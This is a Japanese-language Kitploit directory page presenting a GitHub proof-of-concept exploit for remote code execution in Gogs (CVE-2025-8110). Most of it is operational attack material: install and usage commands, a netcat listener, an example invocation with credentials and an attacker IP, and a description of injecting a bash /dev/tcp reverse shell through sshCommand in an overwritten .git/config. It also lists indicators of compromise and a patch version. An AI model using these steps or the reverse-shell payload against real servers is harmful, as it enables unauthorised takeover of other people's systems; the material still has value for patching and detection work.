Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-8110 — Gogs RCE PoC - CVE-2025-8110 | Kitploit
ツール/GitHubGitHub/x4brozer/cve-2025-8110
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubx4brozer/cve-2025-8110

CVE-2025-8110

Gogs RCE PoC - CVE-2025-8110

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Gogs RCEエクスプロイト (CVE-2025-8110)

Python License

CVE-2025-8110の概念実証 - シンボリックリンクバイパスとsshCommandインジェクションによるGogsでのリモートコード実行。

説明

このエクスプロイトは、Gogs APIのシンボリックリンクバイパスを悪用して.git/configを上書きし、リバースシェルを実行する悪意のあるsshCommandを注入します。

必要条件

  • Python 3.12+
  • Gitがインストールされていること
  • 有効なGogs認証情報
  • Gogs APIトークン

インストール

root@kitploit:~
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt

引数 説明 -u, --url 対象Gogs URL (例: http://target:3000) -U, --username Gogsユーザー名 -P, --password Gogsパスワード -t, --token Gogs APIトークン -lh, --host リバースシェル用の自分のIP -lp, --port リスナー用のポート -x, --proxy プロキシを有効化 (localhost:8080)

使用方法

ステップ1: APIトークンを取得

Gogsにログイン → 設定 → アプリケーション → トークンを生成

ステップ2: リスナーを起動

root@kitploit:~
nc -lvnp 4444

ステップ3: エクスプロイトを実行

root@kitploit:~
python3 exploit.py -u http://target:3000 -U <USERNAME GOGS> -P <PASSWORD GOGS> -t <TOKEN> -lh <ATTACKER IP> -lp <ATTACKER PORT>

例

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444

仕組み

  • .git/configへのシンボリックリンクを持つリポジトリを作成
  • PutContents APIを使用してシンボリックリンクに書き込む
  • sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' # を注入
  • Gogsがコマンドを実行 → リバースシェル

トラブルシューティング 問題 解決策 ログイン失敗 ユーザー名/パスワードを確認 リポジトリ作成失敗 APIトークンを再生成 読み取りタイムアウト 正常 - リスナーを確認 シェルが返ってこない ファイアウォールを確認し、別のポートを試す

侵害指標(IoC)

  • ランダムな8文字のリポジトリ名
  • リポジトリ内のmalicious_linkシンボリックリンク
  • .git/config内のsshCommand

対応策 Gogs v0.13.4以降にアップデート:

root@kitploit:~
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz

法的免責事項 このツールは教育目的および許可されたテストのみを目的としています。不正アクセスは違法です。

クレジット 発見: Wiz Research オリジナルPoC: zAbuQasem エクスプロイト: X4BROZER

ツールをダウンロード